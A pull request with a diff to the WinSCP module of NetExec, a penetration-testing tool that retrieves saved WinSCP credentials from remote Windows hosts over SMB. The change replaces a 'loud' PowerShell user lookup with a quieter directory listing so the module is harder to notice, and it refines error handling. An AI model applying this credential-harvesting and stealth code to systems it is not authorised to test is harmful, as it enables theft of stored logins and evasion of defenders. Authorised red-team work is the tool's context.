### PR TITLE
Improve WinSCP module

### DIFF
--- a/nxc/modules/winscp.py
+++ b/nxc/modules/winscp.py
@@ -8,10 +8,12 @@ import traceback
 from impacket.dcerpc.v5.rpcrt import DCERPCException
 from impacket.dcerpc.v5 import rrp
 from impacket.examples.secretsdump import RemoteOperations
+from impacket.smbconnection import SessionError
 from urllib.parse import unquote
 from io import BytesIO
 import re
 import configparser
+
 
 
 class NXCModule:
@@ -306,7 +308,11 @@ class NXCModule:
             context.log.fail(f"UNEXPECTED ERROR: {e}")
             context.log.debug(traceback.format_exc())
         finally:
-            remote_ops.finish()
+            try:
+                remote_ops.finish()
+            except rrp.DCERPCSessionError as e:
+                # Likely can't stop rrp due to other services dependending on it
+                context.log.debug(f"Error finishing remote operations: {e}")
 
     # ==================== Handle Configs ====================
     def decode_config_file(self, context, confFile):
@@ -346,14 +352,19 @@ class NXCModule:
                 context.log.debug(traceback.format_exc())
         else:
             context.log.display("Looking for WinSCP creds in User documents and AppData...")
-            output = connection.execute('powershell.exe "Get-LocalUser | Select name"', True)
-            users = [row.strip() for row in output.split("\r\n")[2:]]
+            users = []
+            out = connection.conn.listPath(self.share, "\\Users\\*")
+            for obj in out:
+                if obj.get_longname() in [".", ".."] or not obj.is_directory():
+                    continue
+                else:
+                    users.append(obj.get_longname())
 
             # Iterate over found users and default paths to look for WinSCP.ini files
             for user in users:
                 paths = [
-                    ("\\Users\\" + user + "\\Documents\\WinSCP.ini"),
-                    ("\\Users\\" + user + "\\AppData\\Roaming\\WinSCP.ini"),
+                    (f"\\Users\\{user}\\Documents\\WinSCP.ini"),
+                    (f"\\Users\\{user}\\AppData\\Roaming\\WinSCP.ini"),
                 ]
                 for path in paths:
                     conf_file = ""
@@ -362,9 +373,12 @@ class NXCModule:
                         connection.conn.getFile(self.share, path, buf.write)
                         conf_file = buf.getvalue().decode()
                         context.log.success(f"Found config file at '{self.share + path}'! Extracting credentials...")
-                    except Exception as e:
+                    except SessionError as e:
                         context.log.debug(f"No config file found at '{self.share + path}': {e}")
-                    if conf_file:
+                    except Exception as e:
+                        context.log.fail(f"Error getting config file at '{self.share + path}': {e}")
+                        context.log.debug(traceback.format_exc())
+                    else:
                         self.decode_config_file(context, conf_file)
 
     def on_admin_login(self, context, connection):


### PR DESCRIPTION
## Description

As pointed out on discord, the WinSCP used `connection.execute` to enumerate the local users. This is quite loud and unnecessary. The module now just uses `conn.listPath("\\Users\\*")` to enumerate all local user folders.
Also improved the error handling to e.g. catch if rrp can't be stopped due to depended services running.

## Type of change
Please delete options that are not relevant.
- [x] Bug fix (non-breaking change which fixes an issue)

## How Has This Been Tested?
Against a normal WIn11 Host

## Screenshots (if appropriate):
![image](https://github.com/user-attachments/assets/93ffc746-d3ee-4191-8c9b-8742fdc10592)

